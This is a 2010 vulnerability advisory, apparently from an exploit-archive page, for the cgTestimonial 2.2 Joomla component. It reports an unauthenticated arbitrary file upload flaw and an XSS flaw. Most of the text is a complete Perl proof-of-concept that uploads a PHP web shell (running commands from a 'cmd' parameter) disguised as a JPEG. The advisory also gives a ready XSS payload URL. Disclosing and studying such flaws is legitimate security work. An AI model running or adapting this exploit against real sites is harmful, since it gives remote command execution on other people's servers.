扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 |
cgTestimonial 2.2 Joomla Component Multiple Remote Vulnerabilities NamecgTestimonial Vendorhttp://www.cmsgalaxy.com Versions Affected 2.2 AuthorSalvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta [at] gmail [dot] com Date2010-08-06 X. INDEX I.ABOUT THE APPLICATION II. DESCRIPTION III.ANALYSIS IV. SAMPLE CODE V.FIX I. ABOUT THE APPLICATION ________________________ cg_Testimonial component is atool for adding testimonialbythe user from frontend and managing and publishing testimonials from backend. ThisJoomlaextensionallows website user to submit a testimonialsformwithseveralfields on one of your site'spageand enableaddingtestimonials by either users or admin. II. DESCRIPTION _______________ Some parameters are not properly sanitised.The following vulnerabilities can be exploited from guest users. III. ANALYSIS _____________ Summary: A) Multiple Arbitrary File Upload B) XSS A) Multiple Arbitrary File Upload _________________________________ Theusr_imgparameterin cgtestimonial.php (frontend) and in testimonial.php(admin, without checks)isnot properly sanitised. A checkis executed on the content- type HTTP field. B) XSS ______ The url parameter in video.php is not properly sanitised before being printed on screen. IV. SAMPLE CODE _______________ A) Multiple Arbitrary File Upload http://poc.salvatorefresta.net/PoC-cgTestimonial2.2.pl.txt B) XSS http://site/path/components/com_cgtestimonial/video.php?url="><script>alert('xss');</script> V. FIX ______ No fix. ################################ PoC-cgTestimonial2.2.pl ################################ #!/usr/bin/perl # # PoC - Remote PHP Shell Upload - cgTestimonial 2.2 Joomla Component # # Author: Salvatore Fresta aka Drosophila # Email:salvatorefresta@gmail.com # # Date: 06 August 2010 # # http://target/path/components/com_cgtestimonial/user_images/filename?cmd=command # use IO::Socket; $usage = "\ncgTestimonial 2.2 Remote PHP Shell Upload - (c) Salvatore Fresta\n". "http://www.salvatorefresta.net\n\n". "Usage: perl PoC-cgTestimonial.pl <hostname> <path>\n\n"; $#ARGV == 1 || die $usage; my $host= $ARGV[0]; my $path= $ARGV[1]; my $stop= 0; my $rand= "master".int(rand 150); my $shell = "<?php echo \"<pre>\"; system(\$_GET['cmd']); echo \"</pre>\"; ?>"; my $filename= "evil.php"; my $code= "--AaB03x\r\n". "Content-Disposition: form-data; name=\"usr_img\"; filename=\"$filename\"\r\n". "Content-Type: image/jpeg\r\n". "\r\n". "$shell\r\n". "--AaB03x--"; my $pkg = "POST ".$path."index.php?option=com_cgtestimonial&task=submit HTTP/1.1\r\n". "Host: $host\r\n". "Content-Type: multipart/form-data; boundary=AaB03x\r\n". "Content-Length: " .length($code). "\r\n". "\r\n". $code; my $socket = new IO::Socket::INET( Proto=> "tcp", PeerAddr=> $host, PeerPort=> "80" ) or die "\n[-] Unable to connect to $host\n\n"; print "\n[+] Connected\n"; print $socket $pkg; $pkg = "GET ".$path."components/com_cgtestimonial/user_images/".$filename." HTTP/1.1\r\n". "Host: $host\r\n\r\n"; print $socket $pkg; while ((my $rec = <$socket>) && $stop != 1) { if($rec !=~ /302 Found/) { $stop = 1; } } if($stop != 1) { print "[-] Shell not uploaded\n"; close($socket); exit; } print "[+] Shell uploaded on ".$host.$path."components/com_cgtestimonial/user_images/".$filename."\n". "[+] Disconnected\n\n"; close($socket); |
体验盒子
